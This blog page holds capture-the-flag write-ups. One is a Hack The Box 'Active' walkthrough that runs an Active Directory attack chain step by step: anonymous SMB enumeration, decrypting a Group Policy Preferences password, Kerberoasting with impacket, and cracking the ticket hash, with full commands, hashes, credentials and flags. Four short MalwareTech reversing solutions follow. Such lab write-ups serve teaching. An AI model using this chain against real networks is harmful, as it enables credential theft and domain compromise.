1n4r1.github.io

© 2024. All rights reserved.

Hackthebox Active Writeup

18 Feb 2019


Explanation

Hackthebox is a website which has bunch of vulnerable machines in its own VPN. This is a write-up of “Active” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- 10.10.10.100 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-14 09:14 EEST
Nmap scan report for 10.10.10.100
Host is up (0.036s latency).
Not shown: 65512 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2018-09-14 06:11:24Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -4m14s, deviation: 0s, median: -4m14s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2018-09-14 09:12:21
|_  start_date: 2018-09-11 14:34:52

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 236.30 seconds

What we have to notice is there is a time difference between our host and Active.
We have to change the current time of our host manually later for Active Directory enumeration.

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.100:47001/

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.100:47001/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2018/09/14 23:40:33 Starting gobuster
=====================================================
=====================================================
2018/09/15 00:06:24 Finished
=====================================================

SMB Share listing:

root@kali:~# smbclient -L 10.10.10.100
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Replication     Disk      
	SYSVOL          Disk      Logon server share 
	Users           Disk      
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

2.Getting User

According to the result above, we have a right to see some of SMB shares.
By enumeration, we can find an interesting file.

root@kali:~# smbclient //10.10.10.100/Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 13:37:44 2018
  ..                                  D        0  Sat Jul 21 13:37:44 2018
  active.htb                          D        0  Sat Jul 21 13:37:44 2018

		10459647 blocks of size 4096. 4924822 blocks available

smb: \active.htb\policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\machine\Preferences\groups\> dir
  .                                   D        0  Sat Jul 21 13:37:44 2018
  ..                                  D        0  Sat Jul 21 13:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 23:46:06 2018

		10459647 blocks of size 4096. 4924822 blocks available

We can find a domain user credentail in Groups.xml

root@kali:~# cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

By taking advantage of “gpp-decrypt” command, we can achieve a password for user “active.htb\SVC_TGS”

root@kali:~# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18

Now we have one credential to get into Active.

user:       active.htb\SVC_TGS
password:   GPPstillStandingStrong2k18

We can use the credentail for doing more enumeration of some SMB shares.
In “USERS”, we can find user.txt

root@kali:~# smbclient -W active.htb -U SVC_TGS //10.10.10.100/USERS
Enter ACTIVE.HTB\SVC_TGS's password:  # GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 17:39:20 2018
  ..                                 DR        0  Sat Jul 21 17:39:20 2018
  Administrator                       D        0  Mon Jul 16 13:14:21 2018
  All Users                         DHS        0  Tue Jul 14 08:06:44 2009
  Default                           DHR        0  Tue Jul 14 09:38:21 2009
  Default User                      DHS        0  Tue Jul 14 08:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 07:57:55 2009
  Public                             DR        0  Tue Jul 14 07:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 18:16:32 2018

		10459647 blocks of size 4096. 4939173 blocks available

smb: \> cd SVC_TGS/desktop
smb: \SVC_TGS\desktop\> dir
  .                                   D        0  Sat Jul 21 18:14:42 2018
  ..                                  D        0  Sat Jul 21 18:14:42 2018
  user.txt                            A       34  Sat Jul 21 18:06:25 2018

		10459647 blocks of size 4096. 4924822 blocks available
smb: \SVC_TGS\desktop\>

We can download the user.txt by get command.

root@kali:~# cat user.txt 
86d67d8ba232bb6a254aa4d10159e983

3.Getting root

Then, continue the enumeration. To identify what service is running on Active, we can use lookupsid.py from impacket.

root@kali:~# ./lookupsid.py active.htb/SVC_TGS:GPPstillStandingStrong2k18@10.10.10.100
Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.100
[*] StringBinding ncacn_np:10.10.10.100[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-405608879-3187717380-1996298813
498: ACTIVE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: ACTIVE\Administrator (SidTypeUser)
501: ACTIVE\Guest (SidTypeUser)
502: ACTIVE\krbtgt (SidTypeUser)
512: ACTIVE\Domain Admins (SidTypeGroup)
513: ACTIVE\Domain Users (SidTypeGroup)
514: ACTIVE\Domain Guests (SidTypeGroup)
515: ACTIVE\Domain Computers (SidTypeGroup)
516: ACTIVE\Domain Controllers (SidTypeGroup)
517: ACTIVE\Cert Publishers (SidTypeAlias)
518: ACTIVE\Schema Admins (SidTypeGroup)
519: ACTIVE\Enterprise Admins (SidTypeGroup)
520: ACTIVE\Group Policy Creator Owners (SidTypeGroup)
521: ACTIVE\Read-only Domain Controllers (SidTypeGroup)
553: ACTIVE\RAS and IAS Servers (SidTypeAlias)
571: ACTIVE\Allowed RODC Password Replication Group (SidTypeAlias)
572: ACTIVE\Denied RODC Password Replication Group (SidTypeAlias)
1000: ACTIVE\DC$ (SidTypeUser)
1101: ACTIVE\DnsAdmins (SidTypeAlias)
1102: ACTIVE\DnsUpdateProxy (SidTypeGroup)
1103: ACTIVE\SVC_TGS (SidTypeUser)

Then, we can achieve kerberous tickets for each service by GetUserSPNs.py

root@kali:~# python GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
--------------------  -------------  --------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 22:06:40  2018-07-30 20:17:40

$krb5tgs$23$*Administrator$ACTIVE.HTB$activeCIFS~445*$00f28190b890c746887da2466a9ede5f$ca49fceb95ed211a8de02bdea6cc167f17b17ab5ca341f2c80f9e0836d5551ee5e6676e3a11055d3bde239172416a2c7f2762b37aeeb76e46c637bdd674ed7be87ebce5c2a1b587754310559f70fb7eb4e1b1b745ab98b3ac86f6ab76b39649e001da4199123f45dd648abe57c42bba7c8768546d89f6454fdb58f2e79932be61bb2b3a016c9dadc7d39a80b11b9f86107790e3a2b70fa44da10e5ef66ddcb509c05b7db0c9911f69048f28ab680e18da80687d5edf141481118b44c029aa1b7f2ee10c7d1bb25a0bafac808c4fc2165da45982839da0807e64e709aa23c457d2d4a2211d13a64aa359b8895351b4608a5f98d17bb935b280d896a50352d2e59b6a0426c774599cfb399207d24481133edcc49c7d96dca8926a1e51ec3b40327c320acd4c6eb942edd40a7aa139d6c8f9b4badf544ee6cf20193b94cbf28811711697310672ca821e98ea9d9c2d4889896699bf20ba3b70f2d64ed4fb74b374ba29364cf7e60c0b4f5c0865c0fedafd5bfe3ad5e176b84aecfb05b74ef940d3596a31e9b566262ce77c3790344be1d9a56f4a084d76d5136f6d613b4352aad2985870937074cb581faa77b9541051192470b8751b6492e045f69157b9306c558f22e218acb72c5a10fb98d191e6df94036f9281264ea7e6df3631d1230a297fea0a039464474fa6669de596f04d12f18b4c24dde9896de4df058b332136c869d461ec41da033bb56d685ee59f66cb2571bf038c3e456723c8270bd95dc2956de6312eb9beccdd614face0a5f20bbe74e96f443853f124ff47c00f6e7508739018b8cb81214bad74be7ef013746245fbe433f8d689db6df240f253da96e9104b471fc09b9558ccc8e587365939b236864c0feff6ccaf0dcbfadf70585489370e0f3958ca0ae85a1f7cd8ea959be70e9afef02c4c6ed9ddd116b8f171bfcb585e24c1e226dd1d8d1186ac9580cf9bceef54c1a1855670bf2054520642a7ee662c6ec6daba43c2c67d173db6554bee7d1b211bd2bcac7e6151c8c8d9fd6d6c01c27890203627e69ec90246c330d1a36e48ba3920b1d01a45c5a4174099b4b4700985cb4af7cf2cf656f5ffa9d58a3fad2e62de5caa3f1b430d07e52292a2d49df9c4f224d31ea5491586db0a24d7cf6dbd8c79342e6fed61940d2ea6a65dc7dc25e53cb01de777a018e182100a2dbcfe07ae339e72893334dcf53e0c65470230c44bdc29f184a376cb03bdc73d416e74b008f740cd8f617d0992ca7

To deal with hash, we can not use default johnTheRipper on Kali linux.
It does not recognize this hash as “hash” and we have to download the “JTR bleeding” from official github for the decryption.

root@kali:~# git clone git://github.com/magnumripper/JohnTheRipper -b bleeding-jumbo john
Cloning into 'john'...
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 87491 (delta 4), reused 5 (delta 1), pack-reused 87475
Receiving objects: 100% (87491/87491), 106.91 MiB | 10.98 MiB/s, done.
Resolving deltas: 100% (68479/68479), done.
root@kali:~# cd john/src/
root@kali:~/john/src# ./configure && make -s clean && make -sj4
checking build system type... x86_64-unknown-linux-gnu
checking host system type... x86_64-unknown-linux-gnu
~~~

root@kali:~/john/src# cd ../run/
root@kali:~/john/run# ./john ../../active.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2019-02-18 12:25) 0.2469g/s 2602Kp/s 2602Kc/s 2602KC/s Tiffani1432..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now we got a password for user Administrator.
Since C$ is a share which we can see the entire C drive, we can find root.txt by accessing it by smbclient.

root@kali:~# smbclient -W active.htb -U Administrator //10.10.10.100/C$
Enter ACTIVE.HTB\Administrator's password: 
Try "help" to get a list of possible commands.
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

Content of root.txt:

root@kali:~# cat root.txt 
b5fc76d1d6b91d77b2fbf2d54d0f708b

4.References

https://room362.com/post/2016/kerberoast-pt1/
https://room362.com/post/2016/kerberoast-pt2/

MalwareTech Beginner Malware Reversing Challenges shellcode1 Writeup

16 Feb 2019

Environment

  • Host OS: Kali linux 2018.4
  • Guest OS: Windows 7 Home Basic
  • Virtualization: Virtualbox 5.2.22
  • Debugger: IDA Pro 7.0

Explanation

We have several malware reversing challenges this page on MalwareTech
This is a write-up of “shellcode1”.

shellcode1.exe contains a flag stored within the executable. When run, the program will output an MD5 hash of the flag but not the original. Can you extract the flag?

Solution

1. Opening the shellcode1.exe

Let’s open the shellcode1.exe.
As we can see on a following picture, it shows a MD5 encrypted flag.

placeholder

Just like strings challenges, we have to “decrypt” this MD5 hash and get original text.

2. Analyzing assembly code

Same as last challenge, to encrypt the original text, a function MD5:digestString is used.

placeholder

It’s argument is in an offset “Str” and it must be a text which we’re looking for.
However, it is already encrypted and sounds like does not mean anything.

placeholder

In this assembly code, we can find the “offset Str” one more time.

placeholder

As we can see, it’s getting the length of Str and storing it into [ecx+4].
Then, figure out what it ecx.

placeholder

Sounds like the value of ecx is return value of HeapAlloc.

DECLSPEC_ALLOCATOR LPVOID HeapAlloc(
  HANDLE hHeap,  // A handle to the heap from which the memory will be allocated. This handle is returned by the HeapCreate or GetProcessHeap function.
  DWORD  dwFlags,  // The heap allocation options.
  SIZE_T dwBytes  // The number of bytes to be allocated.
);

And the return value is a pointer to the allocated momory block.
This means, after these instructions below, values of ecx and ecx+4 are

ecx: pointer to allocated heap
ecx+4: length of Str

Then we still have 3 functions which we have to analyze.

call    ds:VirtualAlloc
call    memcpy
call    [ebp+Dst]

Sounds like return value of VirtualAlloc is set in [ebp+Dst]. placeholder According to the official document, the arguments of VirtualAlloc are

LPVOID VirtualAlloc(
  LPVOID lpAddress,        // The starting address of the region to allocate. 
  SIZE_T dwSize,           // The size of the region, in bytes.
  DWORD flAllocationType,  // The type of memory allocation.
  DWORD flProtect          // The memory protection for the region of pages to be allocated.
);

and in this case, VirtualAlloc is called like

LPVOID WINAPI VirtualAlloc(0, 0Dh, 1000h, 40h);

Next, look at memcpy.

void *  memcpy(
  void * destination,   // Pointer to the destination array where the content is to be copied, type-casted to a pointer of type void*.
  const void * source,  // Pointer to the source of data to be copied, type-casted to a pointer of type const void*.
  size_t num,           // Number of bytes to copy.
);

This means, in this case, memcpy is called like

memcpy([ebp+Dst], offset unk_404068, 0Dh)

We can find that the unknown function [ebp+Dst] is from offset unk_404068. Looks like just some encrypted codes. However, we can convert the data to code with C key.

placeholder

Sounds like this doing followning things.

1. put value of [esi] into edi
2. put value of [esi+4] into ecx
3. Rotate left the values of esi 5 times
4. Do this procedure for esi length + 4 times

At this time, the value of esi is [ebp+var_4]. This means it is heap space allocated.
Now, we have offset Str in the heapspace.
In summerize, the value which Str is modified by this function above is the original text.

3. decryption

Now we know what we have to do.
After selecting the data we need, we can export it with “Edit->Export data” (or Shift+E) and choose C hex for python code. placeholder

Then, what we have to do is writing a code for decryption.

#! /usr/bin/python


flag = bytearray([0x32, 0x62, 0x0A, 0x3A, 0xDB, 0x9A, 0x42, 0x2A, 0x62, 0x62,
                  0x1A, 0x7A, 0x22, 0x2A, 0x69, 0x4A, 0x9A, 0x72, 0xA2, 0x69,
                  0x52, 0xAA, 0x9A, 0xA2, 0x69, 0x32, 0x7A, 0x92, 0x69, 0x2A,
                  0xC2, 0x82, 0x62, 0x7A, 0x4A, 0xA2, 0x9A, 0xEB, 0x00, 0x00])


rol = lambda val, r_bits, max_bits: \
(val << r_bits%max_bits) & (2**max_bits-1) | \
((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))

for i in range(len(flag)):
    flag[i] = rol(flag[i], 5, 8)

print flag

By executing this code, we can obtain the original text.

root@kali:~# ./rol.py 
FLAG{SHELLCODE-ISNT-JUST-FOR-EXPLOITS}

MalwareTech Beginner Malware Reversing Challenges Strings3 Writeup

13 Feb 2019

Environment

  • Host OS: Kali linux 2018.4
  • Guest OS: Windows 7 Home Basic
  • Virtualization: Virtualbox 5.2.22
  • Debugger: IDA Pro 7.0
  • Other: Resource Hacker v5.1.7

Explanation

We have several malware reversing challenges this page on MalwareTech
This is a write-up of “Strings3”.

strings3.exe contains an un-encrypted flag stored within the executable. When run, the program will output an MD5 hash of the flag but not the original. Can you extract the flag?

Solution

1. Opening with IDA and Resource Hacker

Let’s open the strings3.exe with IDA and search for the flag. According to the strings windows, it looks like we don’t have any encrypted flag. placeholder Then, what we can guess is that this executable is loading the flag from somewhere else.
We can use “Resource Hacker” to figure out “Hidden” resources on IDA. placeholder As we can see, there are too many “Possible flags” and we still have to figure out which is the correct password.

2. Identify the correct flag

To identify the correct flag, we can take advantage of these functions. placeholder According to the official document of “LoadStringA” function, it takes 4 arguments.

int LoadStringA(
  HINSTANCE hInstance, // A handle to an instance of the module whose executable file contains the string resource.
  UINT      uID, // The identifier of the string to be loaded.
  LPSTR     lpBuffer, // The buffer to receive the string or a read-only pointer to the string resource itself.
  int       cchBufferMax // The size of the buffer, in characters.
);

This means, in strings3.exe, LoadStringA is called like this

int LoadStringA(0, edx, ecx, 0x3FF)

Sounds like we have to figure out what’s the value of edx.
To figure out this, we have to focus on following instructions. placeholder Let’s see valus of eax and edx. placeholder We can figure out the value of each register by python interpreter.

root@kali:~# python
Python 2.7.15+ (default, Feb  3 2019, 13:13:16) 
[GCC 8.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> 1 << 8 # shl edx, 8
256
>>> 1 << 4 # shl eax, 4
16
>>> 256 | 16 # or eax, edx
272
>>>

According to this, after the “or eax, edx” instruction, the value of eax is 272.
This value is stored in [ebp+var_4]. Then it is moved to edx. placeholder So the value of edx which is argument of LoadStringA is “272”. if we look at num 272 of string table, we can find the correct flag. placeholder

MalwareTech Beginner Malware Reversing Challenges Strings2 Writeup

12 Feb 2019

Environment

  • Host OS: Kali linux 2018.4
  • Guest OS: Windows 7 Home Basic
  • Virtualization: Virtualbox 5.2.22
  • Debugger: IDA Pro 7.0

Explanation

We have several malware reversing challenges this page on MalwareTech
This is a write-up of “Strings2”.

strings2.exe contains an un-encrypted flag stored within the executable. When run, the program will output an MD5 hash of the flag but not the original. Can you extract the flag?

Solution

1. Opening with IDA

When we open the strings2.exe with IDA, we can get following lots of variables. placeholder Then, bunch of mov instructions are following. placeholder Because there is “h” trailing, we can figure out these are hex numbers.

2. Translate hex to ascii

We can write a python script which translates there hex codes to ascii characters.

root@kali:~# cat strings2.py 
#! /usr/bin/python3

import binascii

HEX = '464C41477B535441434B2D535452494E47532D4152452D424553542D535452494E47537D'


def main():
    print(binascii.a2b_hex(HEX))


if __name__ == "__main__":
    main()

Let’s execute the python script.
We can grab the flag for this challenge.

root@kali:~# ./strings2.py 
b'FLAG{STACK-STRINGS-ARE-BEST-STRINGS}'

MalwareTech Beginner Malware Reversing Challenges Strings1 Writeup

10 Feb 2019

Environment

  • Host OS: Kali linux 2018.4
  • Guest OS: Windows 7 Home Basic
  • Virtualization: Virtualbox 5.2.22
  • Debugger: IDA Pro 7.0

Explanation

We have several malware reversing challenges this page on MalwareTech
This is a write-up of “Strings1” on that website.

strings1.exe contains an un-encrypted flag stored within the executable. When run, the program will output an MD5 hash of the flag but not the original. Can you extract the flag?

Solution

1. Opening with IDA

Sounds like we have to find an un-encrypted flag from one windows executable file strings1.exe.
As written on the challenge web page, we don’t need to run the executable.
By opening with IDA, we can see the overal structure.
placeholder To find a strings, we can go to Strings window.
(View->Open Subviews->Strings or Shift+F12). placeholder As we can see, we have too many numbers of possible flags.

2. Analysing assembly code

placeholder By reading the disassembly code, we can find that after a few lines of standard instructions, we have these instructions below.
placeholder looks like it is hashing the characters in off_432294.
By double clicking the operand, we can see the value of the address. placeholder This is the flag which we have to find.